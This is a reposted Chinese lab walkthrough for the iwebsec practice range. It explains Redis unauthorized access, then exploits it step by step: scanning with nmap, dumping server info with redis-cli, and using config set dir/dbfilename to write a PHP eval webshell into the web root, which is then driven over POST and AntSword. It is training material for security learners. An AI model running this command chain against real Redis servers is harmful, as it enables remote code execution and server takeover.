0


iwebsec靶场 数据库漏洞通关2-Redis数据库漏洞

iwebsec靶场的redis漏洞为未授权漏洞,如下所示。

一、Redis未授权漏洞原因

那么这个未授权漏洞的原理是什么呢?Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

简单说,漏洞的产生条件有以下两点:
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;
(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务

二、渗透环境搭建

首先在自己的机器搭建渗透环境,Kali虚拟机系统作为攻击方,iwebsec的ubuntu虚拟机作为渗透靶场,为了保证两台机器可以互通,将两台虚拟机都设置为vmnet8的nat方式连接。

1.Kali系统作为攻击方配置环境

在进行渗透的过程中,使用Kali作为攻击主机,首先需要kali系统使用redis客户端连接到靶机的redis服务器,即攻击端需要安装redis客户端。

(1)Kali攻击主机环境配置

使用ifconfig -a命令获取ip地址,这里选择vmnet8网段的192.168.71.129

这样如果靶机启动redis服务进程后,就可以使用测试攻击机Kali中的redis-cli程序和靶机的redis服务交互了。

(2)既然使用kali系统作为攻击主机,那么攻击机需要可以使用redis-cli程序来连接靶机的redis服务程序。于是需要使用apt-get install redis-server安装redis,为避免安装失败可以先进行update,如下所示

sudo apt-get update
sudo apt-get install redis-server -y

安装过程如下所示

(3) 安装成功后执行redis-cli -h确认安装是否成功

sudo redis-cli -h

当展示出如下界面时,代表安装redis成功

2.获取靶机Redis服务器的ip地址与开启的端口号

(1)打开iwebsec虚拟机,通过ifconfig -a确认kali可以访问的同一网段的ip地址,如下所示这里选择使用vmnet8同一网段的ip地址192.168.71.151

(2)打开iwebsec靶场,如下所示关卡的最后一关为redis数据库漏洞

点开后效果如下,提示redis端口为6379,用户名密码为空,正好满足前面我们讲过的redis未授权漏洞存在的前提。

3.获取redis服务器的端口号

如上图所示,iwebsec实际上是使用docker搭建的,也就是说这个ubuntu虚拟机中通关docker搭建的iwebsec靶场。docker中开启的redis端口与这台ubuntu虚拟靶机之间具有端口映射关系,这个端口映射是一一对应关系。接下来要做的就是通过docker命令查询这个映射关系,以确定docker中的iwebsec在ubuntu中的端口号是什么

1)通过首先使用docker ps获取到容器的id

docker ps

运行结果如下,docker容器的id为bc23a49cb37c

如上端口号中有0.0.0.0:6379->6379/tcp,也就是说docker容器中的3306端口号映射到ubuntu虚拟机的6379端口号,那么也就是说通过访问ubuntu的6379端口即可访问到靶机的Redis服务

2)在ubuntu iwebsec虚拟机中此时使用netstat -ano|grep 6379时

netstat -ano|grep 6379

如下显示出此端口已经打开

三、Redis渗透

1.Kali使用Nmap扫描靶机

我们在攻击机使用nmap尝试扫描靶机,命令如下

nmap 192.168.71.151 -p 6379

看看是否能扫描出redis服务端口号

2.Redis敏感信息获取

kali攻击机(模拟redis客户端)执行命令,

sudo redis-cli -h 192.168.71.151

连接成功后在出现的交互界面中输入info

info

效果如下

如上所示,直接获取到靶机redis服务的敏感信息

3.Redis上传webshell获取控制权

接下来打算在网站根目录下放置一个webshell

(1)在网站的根目录/var/www/html下写一个webshell脚本,配置方法为

config set dir /var/www/html

(2)脚本名称为shell.php

config set dbfilename shell.php

(3)脚本内容为<?php @eval($_POST['cmd']); ?>

set webshell "<?php @eval($_POST['cmd']); ?>"

综上整体渗透脚本为

sudo redis-cli   -h   192.168.71.151
config set dir /var/www/html
config set dbfilename shell.php
set webshell "<?php @eval($_POST['cmd']); ?>"
save

渗透交互如下所示

(4)使用浏览器访问webshell,执行cmd=phpinfo()获取服务器的php信息,如下所示
由于webshell脚本被放到根目录中,故而webshell的url链接为 http://192.168.71.151/shell.php
post参数为 cmd=phpinfo();

如上所示渗透成功

(5)蚁剑验证webshell上传成功

如下所示,webshell的url链接为 http://192.168.71.151/shell.php 连接密码为cmd

新增后效果如下,选择文件管理

如下所示,渗透成功


本文转载自: https://blog.csdn.net/mooyuan/article/details/128020271
版权归原作者 mooyuan天天 所有, 如有侵权,请联系我们删除。

“iwebsec靶场 数据库漏洞通关2-Redis数据库漏洞”的评论:

还没有评论